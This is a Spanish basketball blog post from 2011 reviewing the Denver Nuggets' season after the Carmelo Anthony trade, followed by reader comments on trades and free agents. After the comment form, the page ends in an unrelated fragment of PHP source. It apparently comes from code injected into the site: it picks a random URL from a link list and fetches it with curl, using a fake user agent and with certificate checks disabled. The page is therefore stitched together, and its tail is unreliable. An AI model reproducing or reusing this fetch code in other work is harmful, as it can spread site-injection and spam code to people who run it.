Denver Nuggets: Notable

08 de July de 2011 por Hynreck

Temporada convulsa la de Denver. Carmelo Anthony planteaba su no continuidad en el equipo y su intención de ser agente libre cuando finalizase el curso. La solución beneficiosa para ambos era un sign and trade.  Problemas. Carmelo únicamente lo firmaría si iba a  N.Y., pero la oferta apetecible llegaba desde N.J. En este tira y afloja finalmente en Denver se movieron muy bien y sacaron petróleo de una situación que, siendo sinceros, no pintaba nada bien para ellos.

Además de Carmelo se fueron Chauncey Billups y su mega-contrato, y jugadores de complemento como Shelden Williams, Anthony Carter y “Bench-Renaldo”. A cambio adquirían un grupo de jugadores jóvenes y muy deseados por cualquier equipo como Gallinari, Wilson Chandler, Felton, Mozgov, futuras rondas y dinero. En la misma operación también llegaría de Minnesota Kostas Koufos. Con ello los Nuggets pasaban a tener una de las plantillas más profundas de la liga, e iniciaban una reconstrucción de la cual se encuentran ya con medio camino recorrido.

El equipo no bajó de nivel, e incluso dio guerra en playoffs. Jugadores como Ty Lawson o Nene Hilario dieron un paso adelante, pero los Thunder de  Kevin Durant partían como favoritos y lo hicieron valer.

Lo mejor: La evolución de Ty Lawson. Ha crecido a la sombra de Billups y cuando le han dado la alternativa no ha defraudado. El margen salarial que tienen y tendrán para los próximos años aparte de un buen número de rondas del draft. Si consiguen atraer alguna estrella serán temibles.

Lo peor: J.R. Smith parece tener todas las condiciones del mundo pero su cabeza está en otro sitio. Un año más que no da el paso que muchos le vemos capacitado para dar. Nene Hilario y Kenyon Martin no renovarán, Hilario es uno de los mejores internos de la liga. Le echarán en falta. No será fácil atraer una estrella al proyecto. Parece preocupante y esperemos que no se pongan de moda casos como los de Miami o New York, con All-Stars poniéndose de acuerdo para buscar un anillo. Equipos con poco mercado lo tendrían crudo, y precisamente esta igualdad entre franquicias es lo bonito de esta liga.

Jugando a GM

– Ya se ha hecho el primer traspaso. Raymond Felton ha sido enviado a Portland a cambio de Andre Miller, que vivirá su segunda etapa en Denver,   y una segunda ronda. En el traspaso también llegaban los derechos del Nº 26 del draft Jordan Hamilton. En el mismo draft, viendo que el equipo se queda cojo por dentro se apostó por Kenneth Faried, quien verá minutos desde el primer día.

– Realmente Denver no tiene la necesidad de hacer ningún traspaso más, ya que cualquier contrato en vigor de los jugadores de los que dispone es apetecible y asumible.

– J.R. Smith siempre puede ser válido, así que le renovaríamos pero sin perder la cabeza, Aarron Afflalo más de lo mismo, y lo más apetecible en la agencia libre puede ser David West, por el que se podría hacer un esfuerzo importante, y Jason Richardson, por el que se ofertaría de no llegar a un acuerdo con los ya mencionados J.R. o Afflalo. Para 2012 seguiría habiendo margen salarial y entonces sí que habría jugadores disponibles como Dwight Howard, el caso es: ¿El proyecto sería atractivo para él?

Comenta

14 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Gran negocio el que hicieron por Carmelo, Nene no se en que equipo podría acabar, Nets, Warriors, Atlanta si tuvise espacio salarial, no se que busca si dinero o proyecto ganador, porque los equipos que tienen espacio salarial estan en recostruccion .

    GM:
    Los movimietos que propones me gustan, igual intentaria mandar a Gallinari o Chandler + al Harington por alguna estrella.¿Cual? no lo se

      Citar

  2. Txusma dice:
    #2

    Creo que los Nuggets se han movido estupéndamente y se han aprovechado de las necesidades de los Knicks, consiguiendo una base más que interesante de cara a las siguientes temporadas. El problema es que Nene abandonará la franquicia lo que les dejará con un juego interior muy debilitado si no hacen ningún movimiento (Faried + Mozgov?). Este año, Gallinari está ante la temporada de su confirmación. Se ha de convertir en el líder del equipo y ser un jugador importante en la liga. De él depende buena parte del éxito del proyecto.

      Citar

  3. Vader dice:
    #3

    Ya di mi opinión en su momento, cuando se realizo el traspaso, y ahora lo voy a repetir. Mal negocio siempre para el equipo que pierde una estrella del calibre de Melo y cada dia que pasa lo veo más claro…

    ¿Que le queda a Denver? Nene se larga, Felton lo han malvendido por un jugador muy bueno pero que le quedan uno o dos años máximo de NBA, Mozgov no tiene minutos para progesar en Denver, Chandler hay que renovarlo por un dinero o dejarlo ir gratis, rondas de NY? Siendo equipo de playoff muy buenas no seran… ¿Que les queda, Gallinari? un jugador que aporta tiro exterior, anotación y poco más.

    ¿Quien va ir a Denver? Howard? CP3? Deron? Por favor, es que ni se lo van a plantear…

    En fin, que igual el año que viene vemos que hasta Cleveland esta mejor que ellos.

    Saludos

      Citar

  4. Esteban dice:
    #4

    creo q ya no es necesario hablan del negocion que hicieron con el cambio de carmelo, simplemente parece un cambio de una mega estrella con 5 añs de contrto por delante y no un expiring sin posibilidades de renovacion, creo que howard y lebron, con contratos vigentes podrian valer lo que los knicks le dieron a danver

    yo creo q si necesitan traspasos y muchos, no veo futuro a un equipo con 11 jugadores de nivel parejo y chances de jugar, pero ninguno por sobre la media, habria q empaquetar a varios de ellos y buscar alguna estrella que le diera alguna especie de salta, mega estrellas no hay en la liga, pero monta ellis, granger o el propio josh smith podrian darle un aire diferente y por lo pronto ser la cara de la franquicia, una cara que hoy no tiene, con tantos jugadors jovenes con sueldos razonables y de buen nivel la pòsibilidad de traspasos son enormes

    igualmente, a ser sinceros, creo que la mayoria de sus “buenos” jugadores ya han tocado su techo, como el caso de chandler que no dara nunca mas lo que dio en ny, o harrington en franco retroceso

    cambios posibles:

    renovar a nene, creo que sobre la pregunta si quiere anillo o dinero, conociendolo quiere dinero, no hay equipos aspirantes que pueden pagarle fortunas, a exepcion de los nets, pero de aspirantes solo tienen la billetera
    segundo movimiento, un traspaso importante, gallinari junto a harrington, incluso mozgov y alguien mas si quieren por una “psuedo estrella”, monta ellis, granger, o el propio nash
    si se consigue este movimiento, denver seria un destino atractivo para david west

    lo que queda claro es que deben sacarse de encima algunos jugadores de buen nivel y conseguir a una estrella, no van a llegar muy lejos sino con este equipo, deberan sacrificar a alguien

    por otro lado, es imposible que denver le sea un destino apetecible a howard, brook lopez o cualquier estrella via agencia libre

      Citar

  5. Txusma dice:
    #5

    Hubiese sido peor si no hubieran cerrado ningún traspaso y Carmelo se hubiese ido totalmente gratis, no?

      Citar

  6. Esteban dice:
    #6

    coincido con VADER, pero solo por que denver ya tenia una base de jugadores “buenos” y agregarlas mas del mismo nivel es sobrepoblacion, pero sin dudas que un equipo que no tenia nada, lease los bobcats ahora, que le llegen felton, chandler, gallinari y mozgov, los 3 serain titulares, y el otro podria serlo, mas rondas mas dinero es un buen negocio

      Citar

  7. safd dice:
    #7

    Los Nuggets lo hicieron bien con Carmelo, y si no que le pregunte a Orlando que ya tiene experiencia desde que se fue Shaq…

    El traspaso de Andre Miller yo creo que lo han hecho porq el año que viene vuelve Billups a su tierra, lo veo claro, por poco irá, pero irá, ya tuvo su momento de gloria en 2004 y ahora solo quiere disfrutar de lo que mas le gusta.

    Yo intentaría renovar a Afflalo y a Chandler, que creo que mínimo se merecen una mid-level y a JR lo renovaría, pero se va a Chicago o algún sitio de estos, asiq imposible. Lo que si intentaría sería renovar a Nene, pero este seguramente tendrá mejores ofertas, porq lo q quiere es ganar el anillo ,nadie creo q le daría los 12k, si acaso GSW se acercaría, del q tiene ofertas (me encantaría verlo ahi, ojala los warriors hagan un buen trade con Monta y consigan tener un Curry-Iguodala-Wright-Lee-Nene o algo así, serían el 8º equipo de PO sin dudas)

    Un buen movimiento sería utilizar el expiring de Andre Miller, de 7 millones.

    Tienen mucha pasta, con la gente que tienen no se van a quedar, intentarán algo seguro. Aunque los PO si Nene se va a un rival directo de conferencia (como GSW) serán imposibles, porq sigo viendo a 7 equipos fijos (LAL, LAC, POR, OKC, DAL, SAS, MEM)

    @Esteban, jugadores jóvenes como Ty (el mejor base que ha drafteado hasta el momento Khan jijijiji), Afflalo, Gallinari o Chandler es imposible que hayan tocado techo, si son muy jóvenes…

    PD: creo que cualquier jugador de Denver de los que entra en rotación podría ser titular en NY

      Citar

  8. Vader dice:
    #8

    @Txusma

    No claro que no, los Nuggets no hicieron mal, dadas las circunstancias… Sólo mantengo que no soy tan optimista con esta franquicia como algunos tras con el traspaso.

    Ahora mismo Denver esta en tierra de nadie, tienen un equipo para luchar por entrar a playoff, sin más aspiraciones. Tienen jugadores jovenes pero no parece que ninguno de ellos pueda ser el jugador franquicia del equipo o tenga margen de mejora para convertirse en una estrella. Al luchar por playoff tampoco tendran elecciones demasiado altas del draft. Y para terminar no son el equipo de un gran mercado que pueda atraer a los grandes agentes libres. Si NY o NJ tuvieran su plantilla te podrias frotar las manos pensando en añadir una megaestrella a la colección de buenos jugadores que tienen, pero no es el caso…

    Si es verdad que Nene no quiere renovar yo apostaria por reconstruir desde ya, Lawson como intocable y negociar con todo el resto para hacerme con 1) Rondas de draft 2) Jugadores jovenes con margen de mejora y años de contrato barato por delante 3) Si fuera posible una estrella. Y sin confiar en pescar una estrella en la agencia libre a menos que sea de segundo nivel. Las franquicias de ciudades pequeñas han de fiar su evolución en el draft y buenos traspasos y no el la agencia libre. El espejo han de ser los Thunder o las Jazz de los 90…

    En la NBA tener una rotación de 10 jugadores sirve de muy poco. En playoff pasan los equipos con los mejores 6-7 jugadores, los otros 3 a veces ni juegan…

    Espero haber explicado mejor mi opinión que es la misma desde el trade de Melo… No es que lo hicieran mal, hicieron lo mejor que podian hacer pero esta claro que si Melo hubiera querido renovar por ellos no lo hubieran traspasado en la vida!! Que algunos opinaban que parecia que fuera Denver el que queria hacer ese traspaso…

    Saludos!!

      Citar

  9. CAMPO2 dice:
    #9

    Esteban, no creo que Brook Lopez sea una estrella, ni llegue a serlo, y mira que soy de los Nets, sera una pseudo estrella, tipo iguodala, Granger o Ellis

      Citar

  10. safd dice:
    #10

      Citar

  11. Esteban dice:
    #11

    campo, puede ser que lopez no sea una estrella, pero el solo hecho de promedirar 20 puntos y ser PIVOTE con lo que escasea eso en la NBA es un gran aliciente, por otro lado lo he visto jugador, tiene grandes movimientos, quiza un poco frio, sin snagre, pero si se lo puede motivar creo q es capaz de explotar enormemente

    coincido que los nuggets hoy por ahy estan en la nada misma, demasiado buenos para una reconstruccion y demasiado malos para pasar primer ronda, pero aun con melo estaba en esa situacion, yo me hubiese quedado con el, estrellas no sobran y ellas son sobre las que se construye un equipo, pero pensar que podrian haber incorporado a davin harris y favors como hizo utha por deron, los nuggets salieron ganando enormemente

    repito, son demasiados jugadores buenos, pero no mas que eso, juntar a varios en dos trapsasos por dos pseudo estrellas, seria una nueva cara del equipo

    sobre los jugadores jovenes, no digo TECHO TECHO, pero si es suficiente para decir que ninguno pdora ser una super estrella, todos podrian en el mejor de los casos promediar entre 15 y 18 pp, varios o casi todos de sus jugadores, pero ninguno puede cargarse el equipo al hombre y definir partidos, como para pensar en ser algo mas q un buen equipo

    jugadores tribles:

    monta ellis, granger, al jefferson, jeff green, josh smith

    dos de estos jugadores, por varios de sus valores, quiza no hagan a este equipo un candidato al titulo pero si los pondria como candidatos a pasar segunda ronda

    deberias sacrificar a gallinari y meter el mega contrato de harrington por josh smith

    y meter a j.r. y chandler haciendo uno de sus qualifer por un granger,

    con esto bajan la cantidad de jugadores “buenos” asumen dos buenos enserio y dejan el resto para acompañarlos

      Citar

  12. CAMPO2 dice:
    #12

    A eso me refiero con Lopez, que le falta sangre e intensidad porque aptitudes tiene, solo le falta actitud y lo de los 20 puntos que los meta cuando sean partidos reñidos, que mucho partidos he visto este año de los Nets y que jueguen todos para ti y metas canastas cuando pierdes de mas e 15 es mas facil

      Citar

  13. Viva_Dirk dice:
    #13

    Tienen todas las posibilidades del mundo la verdad, es cuestión de gestionarlo bien. Pueden tener juego exterior para muchos años con Lawson-Gallinari-Chandler y entre los 3 deberian ocupar entre 25 y 30 millones segun los años, a Miller podrian venderlo por Kaman o por otro interior, y después tendrán dinero y un equipo atractivo para llevarse una estrella interior o un par de All-Stars este mismo año.

    Perfectamente podria quedarles para este verano: Lawson-Gallinari-Chandler-West-Marc con Miller, Harrington, Andersen, Mozgov y Afflalo en el banco, con la posibilidad de renovar a JR Smith y Kenyon.

      Citar

  14. Txusma dice:
    #14

    Pues a mi me da que Chandler no sigue en los Nuggets y si lo hace será como sexto hombre. Afflalo esá muy bien considerado en Denver y será el escolta titular.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>